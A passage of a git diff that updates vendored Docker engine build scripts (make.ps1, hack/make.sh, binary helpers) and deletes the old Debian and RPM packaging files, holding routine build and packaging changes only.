the "-All" shortcut to turn on all things we can handle. - if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True } + # Note we expressly only include the items which can run in a container - the validations tests cannot + # as they require the .git directory which is excluded from the image by .dockerignore + if ($All) { $Client=$True; $Daemon=$True; $TestUnit=$True } # Handle the "-Binary" shortcut to build both client and daemon. if ($Binary) { $Client = $True; $Daemon = $True } - # Make sure we have something to do - if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' } + # Default to building the daemon if not asked for anything explicitly. + if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { $Daemon=$True } # Verify git is installed if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" } @@ -329,12 +349,15 @@ Try { $gitCommit=Get-GitCommit if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' } - # Get the version of docker (eg 1.14.0-dev) - $dockerVersion=Get-DockerVersion + # Get the version of docker (eg 17.04.0-dev) + $dockerVersion="0.0.0-dev" # Give a warning if we are not running in a container and are building binaries or running unit tests. # Not relevant for validation tests as these are fine to run outside of a container. - if ($Client -or $Daemon -or $TestUnit) { Check-InContainer } + if ($Client -or $Daemon -or $TestUnit) { $inContainer=Check-InContainer } + + # If we are not in a container, validate the version of GO that is installed. + if (-not $inContainer) { Verify-GoVersion } # Verify GOPATH is set if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" } @@ -342,7 +365,7 @@ Try { # Run autogen if building binaries or running unit tests. if ($Client -or $Daemon -or $TestUnit) { Write-Host "INFO: Invoking autogen..." - Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion } + Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion -Platform "$env:PLATFORM" } Catch [Exception] { Throw $_ } } @@ -369,7 +392,32 @@ Try { # Perform the actual build if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" } - if ($Client) { Execute-Build "client" "" "docker" } + if ($Client) { + # Get the Docker channel and version from the environment, or use the defaults. + if (-not ($channel = $env:DOCKERCLI_CHANNEL)) { $channel = "edge" } + if (-not ($version = $env:DOCKERCLI_VERSION)) { $version = "17.06.0-ce" } + + # Download the zip file and extract the client executable. + Write-Host "INFO: Downloading docker/cli version $version from $channel..." + $url = "https://download.docker.com/win/static/$channel/x86_64/docker-$version.zip" + Invoke-WebRequest $url -OutFile "docker.zip" + Try { + Add-Type -AssemblyName System.IO.Compression.FileSystem + $zip = [System.IO.Compression.ZipFile]::OpenRead("$PWD\docker.zip") + Try { + if (-not ($entry = $zip.Entries | Where-Object { $_.Name -eq "docker.exe" })) { + Throw "Cannot find docker.exe in $url" + } + [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, "$PWD\bundles\docker.exe", $true) + } + Finally { + $zip.Dispose() + } + } + Finally { + Remove-Item -Force "docker.zip" + } + } } # Run unit tests @@ -403,6 +451,7 @@ Catch [Exception] { Throw $_ } Finally { + Pop-Location # As we pushed to the root of the repo as the very first thing if ($global:pushed) { Pop-Location } Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)" } diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh index f0e482feda..cd9232a4a5 100755 --- a/vendor/github.com/docker/docker/hack/make.sh +++ b/vendor/github.com/docker/docker/hack/make.sh @@ -36,7 +36,7 @@ if [ "$(go env GOHOSTOS)" = 'windows' ]; then unset inContainer fi else - if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then + if [ "$PWD" != "/go/src/$DOCKER_PKG" ]; then unset inContainer fi fi @@ -56,21 +56,20 @@ echo # List of bundles to create when no argument is passed DEFAULT_BUNDLES=( - binary-client binary-daemon dynbinary - test-unit - test-integration-cli + test-integration test-docker-py cross - tgz ) -VERSION=$(< ./VERSION) -! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') -if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then +VERSION=${VERSION:-dev} +! BUILDTIME=$(date -u -d "@${SOURCE_DATE_EPOCH:-$(date +%s)}" --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') +if [ "$DOCKER_GITCOMMIT" ]; then + GITCOMMIT="$DOCKER_GITCOMMIT" +elif command -v git &> /dev/null && [ -e .git ] && git rev-parse &> /dev/null; then GITCOMMIT=$(git rev-parse --short HEAD) if [ -n "$(git status --porcelain --untracked-files=no)" ]; then GITCOMMIT="$GITCOMMIT-unsupported" @@ -83,8 +82,6 @@ if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; the git status --porcelain --untracked-files=no echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" fi -elif [ "$DOCKER_GITCOMMIT" ]; then - GITCOMMIT="$DOCKER_GITCOMMIT" else echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified' echo >&2 ' Please either build with the .git directory accessible, or specify the' @@ -98,13 +95,6 @@ if [ "$AUTO_GOPATH" ]; then mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")" ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}" export GOPATH="${PWD}/.gopath" - - if [ "$(go env GOOS)" = 'solaris' ]; then - # sys/unix is installed outside the standard library on solaris - # TODO need to allow for version change, need to get version from go - export GO_VERSION=${GO_VERSION:-"1.7.1"} - export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}" - fi fi if [ ! "$GOPATH" ]; then @@ -113,7 +103,12 @@ if [ ! "$GOPATH" ]; then exit 1 fi -DOCKER_BUILDTAGS+=" daemon" +# Adds $1_$2 to DOCKER_BUILDTAGS unless it already +# contains a word starting from $1_ +add_buildtag() { + [[ " $DOCKER_BUILDTAGS" == *" $1_"* ]] || DOCKER_BUILDTAGS+=" $1_$2" +} + if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then DOCKER_BUILDTAGS+=" journald" elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then @@ -129,18 +124,19 @@ if \ fi # test whether "libdevmapper.h" is new enough to support deferred remove -# functionality. +# functionality. We favour libdm_dlsym_deferred_remove over +# libdm_no_deferred_remove in dynamic cases because the binary could be shipped +# with a newer libdevmapper than the one it was built wih. if \ command -v gcc &> /dev/null \ - && ! ( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \ + && ! ( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null $(pkg-config --libs devmapper) &> /dev/null ) \ ; then - DOCKER_BUILDTAGS+=' libdm_no_deferred_remove' + add_buildtag libdm dlsym_deferred_remove fi # Use these flags when compiling the tests and final binary IAMSTATIC='true' -source "$SCRIPTDIR/make/.go-autogen" if [ -z "$DOCKER_DEBUG" ]; then LDFLAGS='-w' fi @@ -149,21 +145,21 @@ LDFLAGS_STATIC='' EXTLDFLAGS_STATIC='-static' # ORIG_BUILDFLAGS is necessary for the cross target which cannot always build # with options like -race. -ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo ) +ORIG_BUILDFLAGS=( -tags "autogen netgo static_build $DOCKER_BUILDTAGS" -installsuffix netgo ) # see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here # When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental # builds by installing dependent packages to the GOPATH. REBUILD_FLAG="-a" -if [ "$DOCKER_INCREMENTAL_BINARY" ]; then +if [ "$DOCKER_INCREMENTAL_BINARY" == "1" ] || [ "$DOCKER_INCREMENTAL_BINARY" == "true" ]; then REBUILD_FLAG="-i" fi ORIG_BUILDFLAGS+=( $REBUILD_FLAG ) BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" ) -# Test timeout. -if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then +# Test timeout. +if [ "${DOCKER_ENGINE_GOARCH}" == "arm64" ] || [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then : ${TIMEOUT:=10m} elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then : ${TIMEOUT:=8m} @@ -186,101 +182,25 @@ if [ "$(uname -s)" = 'FreeBSD' ]; then LDFLAGS="$LDFLAGS -extld clang" fi -# If sqlite3.h doesn't exist under /usr/include, -# check /usr/local/include also just in case -# (e.g. FreeBSD Ports installs it under the directory) -if [ ! -e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then - export CGO_CFLAGS='-I/usr/local/include' - export CGO_LDFLAGS='-L/usr/local/lib' -fi - -HAVE_GO_TEST_COVER= -if \ - go help testflag | grep -- -cover > /dev/null \ - && go tool -n cover > /dev/null 2>&1 \ -; then - HAVE_GO_TEST_COVER=1 -fi - -# a helper to provide ".exe" when it's appropriate -binary_extension() { - if [ "$(go env GOOS)" = 'windows' ]; then - echo -n '.exe' - fi -} - -hash_files() { - while [ $# -gt 0 ]; do - f="$1" - shift - dir="$(dirname "$f")" - base="$(basename "$f")" - for hashAlgo in md5 sha256; do - if command -v "${hashAlgo}sum" &> /dev/null; then - ( - # subshell and cd so that we get output files like: - # $HASH docker-$VERSION - # instead of: - # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION - cd "$dir" - "${hashAlgo}sum" "$base" > "$base.$hashAlgo" - ) - fi - done - done -} - bundle() { local bundle="$1"; shift echo "---> Making bundle: $(basename "$bundle") (in $DEST)" source "$SCRIPTDIR/make/$bundle" "$@" } -copy_binaries() { - dir="$1" - # Add nested executables to bundle dir so we have complete set of - # them available, but only if the native OS/ARCH is the same as the - # OS/ARCH of the build target - if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then - if [ -x /usr/local/bin/docker-runc ]; then - echo "Copying nested executables into $dir" - for file in containerd containerd-shim containerd-ctr runc init proxy; do - cp `which "docker-$file"` "$dir/" - if [ "$2" == "hash" ]; then - hash_files "$dir/docker-$file" - fi - done - fi - fi -} - -install_binary() { - file="$1" - target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" - if [ "$(go env GOOS)" == "linux" ]; then - echo "Installing $(basename $file) to ${target}" - cp -L "$file" "$target" - else - echo "Install is only supported on linux" - return 1 - fi -} - main() { - # We want this to fail if the bundles already exist and cannot be removed. - # This is to avoid mixing bundles from different versions of the code. - mkdir -p bundles - if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then - echo "bundles/$VERSION already exists. Removing." - rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1 + if [ -z "${KEEPBUNDLE-}" ]; then + echo "Removing bundles/" + rm -rf "bundles/*" echo fi + mkdir -p bundles + # Windows and symlinks don't get along well if [ "$(go env GOHOSTOS)" != 'windows' ]; then - # Windows and symlinks don't get along well - rm -f bundles/latest - ln -s "$VERSION" bundles/latest + # preserve latest symlink for backward compatibility + ln -sf . bundles/latest fi if [ $# -lt 1 ]; then @@ -289,7 +209,7 @@ main() { bundles=($@) fi for bundle in ${bundles[@]}; do - export DEST="bundles/$VERSION/$(basename "$bundle")" + export DEST="bundles/$(basename "$bundle")" # Cygdrive paths don't play well with go build -o. if [[ "$(uname -s)" == CYGWIN* ]]; then export DEST="$(cygpath -mw "$DEST")" diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary index f5c35c3b7e..9375926d6b 100644 --- a/vendor/github.com/docker/docker/hack/make/.binary +++ b/vendor/github.com/docker/docker/hack/make/.binary @@ -1,12 +1,42 @@ -#!/bin/bash +#!/usr/bin/env bash set -e +# a helper to provide ".exe" when it's appropriate +binary_extension() { + if [ "$(go env GOOS)" = 'windows' ]; then + echo -n '.exe' + fi +} + +GO_PACKAGE='github.com/docker/docker/cmd/dockerd' +BINARY_SHORT_NAME='dockerd' BINARY_NAME="$BINARY_SHORT_NAME-$VERSION" BINARY_EXTENSION="$(binary_extension)" BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" source "${MAKEDIR}/.go-autogen" +hash_files() { + while [ $# -gt 0 ]; do + f="$1" + shift + dir="$(dirname "$f")" + base="$(basename "$f")" + for hashAlgo in md5 sha256; do + if command -v "${hashAlgo}sum" &> /dev/null; then + ( + # subshell and cd so that we get output files like: + # $HASH docker-$VERSION + # instead of: + # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION + cd "$dir" + "${hashAlgo}sum" "$base" > "$base.$hashAlgo" + ) + fi + done + done +} + ( export GOGC=${DOCKER_BUILD_GOGC:-1000} @@ -20,15 +50,9 @@ if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARC esac fi -if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then - if [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then - export CGO_ENABLED=1 - export CC=o64-clang - export LDFLAGS='-linkmode external -s' - export LDFLAGS_STATIC_DOCKER='-extld='${CC} - else - export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary - fi +# -buildmode=pie is not supported on Windows. +if [ "$(go env GOOS)" != "windows" ]; then + BUILDFLAGS+=( "-buildmode=pie" ) fi echo "Building: $DEST/$BINARY_FULLNAME" @@ -38,6 +62,7 @@ go build \ -ldflags " $LDFLAGS $LDFLAGS_STATIC_DOCKER + $DOCKER_LDFLAGS " \ $GO_PACKAGE ) diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup index b9f8ce2517..15de89fe10 100644 --- a/vendor/github.com/docker/docker/hack/make/.binary-setup +++ b/vendor/github.com/docker/docker/hack/make/.binary-setup @@ -1,6 +1,5 @@ -#!/bin/bash +#!/usr/bin/env bash -DOCKER_CLIENT_BINARY_NAME='docker' DOCKER_DAEMON_BINARY_NAME='dockerd' DOCKER_RUNC_BINARY_NAME='docker-runc' DOCKER_CONTAINERD_BINARY_NAME='docker-containerd' diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat deleted file mode 100644 index ec635144f6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/compat +++ /dev/null @@ -1 +0,0 @@ -9 diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control deleted file mode 100644 index 0f5439947c..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/control +++ /dev/null @@ -1,29 +0,0 @@ -Source: docker-engine -Section: admin -Priority: optional -Maintainer: Docker -Standards-Version: 3.9.6 -Homepage: https://dockerproject.org -Vcs-Browser: https://github.com/docker/docker -Vcs-Git: git://github.com/docker/docker.git - -Package: docker-engine -Architecture: linux-any -Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends} -Recommends: aufs-tools, - ca-certificates, - cgroupfs-mount | cgroup-lite, - git, - xz-utils, - ${apparmor:Recommends} -Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs -Description: Docker: the open-source application container engine - Docker is an open source project to build, ship and run any application as a - lightweight container - . - Docker containers are both hardware-agnostic and platform-agnostic. This means - they can run anywhere, from your laptop to the largest EC2 compute instance and - everything in between - and they don't require you to use a particular - language, framework or packaging system. That makes them great building blocks - for deploying and scaling web apps, databases, and backend services without - depending on a particular stack or provider. diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion deleted file mode 100644 index 6ea1119308..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion +++ /dev/null @@ -1 +0,0 @@ -contrib/completion/bash/docker diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default deleted file mode 120000 index 4278533d65..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/sysvinit-debian/docker.default \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init deleted file mode 120000 index 8cb89d30dd..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/sysvinit-debian/docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart deleted file mode 120000 index 7e1b64a3e6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/upstart/docker.conf \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install deleted file mode 100644 index dc6b25f04f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install +++ /dev/null @@ -1,12 +0,0 @@ -#contrib/syntax/vim/doc/* /usr/share/vim/vimfiles/doc/ -#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/ -#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/ -contrib/*-integration usr/share/docker-engine/contrib/ -contrib/check-config.sh usr/share/docker-engine/contrib/ -contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/ -contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/ -contrib/init/systemd/docker.service lib/systemd/system/ -contrib/init/systemd/docker.socket lib/systemd/system/ -contrib/mk* usr/share/docker-engine/contrib/ -contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/ -contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/ diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages deleted file mode 100644 index 1aa62186a6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages +++ /dev/null @@ -1 +0,0 @@ -man/man*/* diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst deleted file mode 100644 index eeef6ca801..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -set -e - -case "$1" in - configure) - if [ -z "$2" ]; then - if ! getent group docker > /dev/null; then - groupadd --system docker - fi - fi - ;; - abort-*) - # How'd we get here?? - exit 1 - ;; - *) - ;; -esac - -#DEBHELPER# diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev deleted file mode 120000 index 914a361959..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/udev/80-docker.rules \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs deleted file mode 100644 index b43bf86b50..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docs +++ /dev/null @@ -1 +0,0 @@ -README.md diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules deleted file mode 100755 index 6522103e5d..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/rules +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/make -f - -VERSION = $(shell cat VERSION) -SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1) -SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true ) - -override_dh_gencontrol: - # if we're on Ubuntu, we need to Recommends: apparmor - echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars - dh_gencontrol - -override_dh_auto_build: - ./hack/make.sh dynbinary - # ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here - -override_dh_auto_test: - ./bundles/$(VERSION)/dynbinary-daemon/dockerd -v - ./bundles/$(VERSION)/dynbinary-client/docker -v - -override_dh_strip: - # Go has lots of problems with stripping, so just don't - -override_dh_auto_install: - mkdir -p debian/docker-engine/usr/bin - cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker - cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd - cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy - cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd - cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim - cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr - cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc - cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init - mkdir -p debian/docker-engine/usr/lib/docker - -override_dh_installinit: - # use "docker" as our service name, not "docker-engine" - dh_installinit --name=docker -ifeq (true, $(SYSTEMD_GT_227)) - $(warning "Setting TasksMax=infinity") - sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service -endif - -override_dh_installudev: - # match our existing priority - dh_installudev --priority=z80 - -override_dh_install: - dh_install - dh_apparmor --profile-name=docker-engine -pdocker-engine - -override_dh_shlibdeps: - dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info - -%: - dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd) diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec deleted file mode 100644 index ae597bd774..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec +++ /dev/null @@ -1,96 +0,0 @@ -# Some bits borrowed from the openstack-selinux package -Name: docker-engine-selinux -Version: %{_version} -Release: %{_release}%{?dist} -Summary: SELinux Policies for the open-source application container engine -BuildArch: noarch -Group: Tools/Docker - -License: GPLv2 -Source: %{name}.tar.gz - -URL: https://dockerproject.org -Vendor: Docker -Packager: Docker - -%global selinux_policyver 3.13.1-102 -%global selinuxtype targeted -%global moduletype services -%global modulenames docker - -Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils -BuildRequires: selinux-policy selinux-policy-devel - -# conflicting packages -Conflicts: docker-selinux - -# Usage: _format var format -# Expand 'modulenames' into various formats as needed -# Format must contain '$x' somewhere to do anything useful -%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done; - -# Relabel files -%global relabel_files() \ - /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \ - -%description -SELinux policy modules for use with Docker - -%prep -%if 0%{?centos} <= 6 -%setup -n %{name} -%else -%autosetup -n %{name} -%endif - -%build -make SHARE="%{_datadir}" TARGETS="%{modulenames}" - -%install - -# Install SELinux interfaces -%_format INTERFACES $x.if -install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} -install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} - -# Install policy modules -%_format MODULES $x.pp.bz2 -install -d %{buildroot}%{_datadir}/selinux/packages -install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages - -%post -# -# Install all modules in a single transaction -# -if [ $1 -eq 1 ]; then - %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1 -fi -%_format MODULES %{_datadir}/selinux/packages/$x.pp.bz2 -%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES -if %{_sbindir}/selinuxenabled ; then - %{_sbindir}/load_policy - %relabel_files - if [ $1 -eq 1 ]; then - restorecon -R %{_sharedstatedir}/docker - fi -fi - -%postun -if [ $1 -eq 0 ]; then - %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || : - if %{_sbindir}/selinuxenabled ; then - %{_sbindir}/load_policy - %relabel_files - fi -fi - -%files -%doc LICENSE -%defattr(-,root,root,0755) -%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2 -%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if - -%changelog -* Tue Dec 1 2015 Jessica Frazelle 1.9.1-1 -- add licence to rpm -- add selinux-policy and docker-engine-selinux rpm diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec deleted file mode 100644 index d53e55b6c9..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec +++ /dev/null @@ -1,254 +0,0 @@ -Name: docker-engine -Version: %{_version} -Release: %{_release}%{?dist} -Summary: The open-source application container engine -Group: Tools/Docker - -License: ASL 2.0 -Source: %{name}.tar.gz - -URL: https://dockerproject.org -Vendor: Docker -Packager: Docker - -# is_systemd conditional -%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210 -%global is_systemd 1 -%endif - -# required packages for build -# most are already in the container (see contrib/builder/rpm/ARCH/generate.sh) -# only require systemd on those systems -%if 0%{?is_systemd} -%if 0%{?suse_version} >= 1210 -BuildRequires: systemd-rpm-macros -%{?systemd_requires} -%else -%if 0%{?fedora} >= 25 -# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301) -BuildRequires: pkgconfig(systemd) -Requires: systemd-units -%else -BuildRequires: pkgconfig(systemd) -Requires: systemd-units -BuildRequires: pkgconfig(libsystemd-journal) -%endif -%endif -%else -Requires(post): chkconfig -Requires(preun): chkconfig -# This is for /sbin/service -Requires(preun): initscripts -%endif - -# required packages on install -Requires: /bin/sh -Requires: iptables -%if !0%{?suse_version} -Requires: libcgroup -%else -Requires: libcgroup1 -%endif -Requires: tar -Requires: xz -%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -# Resolves: rhbz#1165615 -Requires: device-mapper-libs >= 1.02.90-1 -%endif -%if 0%{?oraclelinux} >= 6 -# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper -Requires: kernel-uek >= 4.1 -Requires: device-mapper >= 1.02.90-2 -%endif - -# docker-selinux conditional -%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global with_selinux 1 -%endif - -# DWZ problem with multiple golang binary, see bug -# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12 -%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global _dwz_low_mem_die_limit 0 -%endif - -# start if with_selinux -%if 0%{?with_selinux} -# Version of SELinux we were using -%if 0%{?fedora} == 20 -%global selinux_policyver 3.12.1-197 -%endif # fedora 20 -%if 0%{?fedora} == 21 -%global selinux_policyver 3.13.1-105 -%endif # fedora 21 -%if 0%{?fedora} >= 22 -%global selinux_policyver 3.13.1-128 -%endif # fedora 22 -%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global selinux_policyver 3.13.1-23 -%endif # centos,oraclelinux 7 -%endif # with_selinux - -# RE: rhbz#1195804 - ensure min NVR for selinux-policy -%if 0%{?with_selinux} -Requires: selinux-policy >= %{selinux_policyver} -Requires(pre): %{name}-selinux >= %{version}-%{release} -%endif # with_selinux - -# conflicting packages -Conflicts: docker -Conflicts: docker-io -Conflicts: docker-engine-cs - -%description -Docker is an open source project to build, ship and run any application as a -lightweight container. - -Docker containers are both hardware-agnostic and platform-agnostic. This means -they can run anywhere, from your laptop to the largest EC2 compute instance and -everything in between - and they don't require you to use a particular -language, framework or packaging system. That makes them great building blocks -for deploying and scaling web apps, databases, and backend services without -depending on a particular stack or provider. - -%prep -%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6 -%setup -n %{name} -%else -%autosetup -n %{name} -%endif - -%build -export DOCKER_GITCOMMIT=%{_gitcommit} -./hack/make.sh dynbinary -# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here - -%check -./bundles/%{_origversion}/dynbinary-client/docker 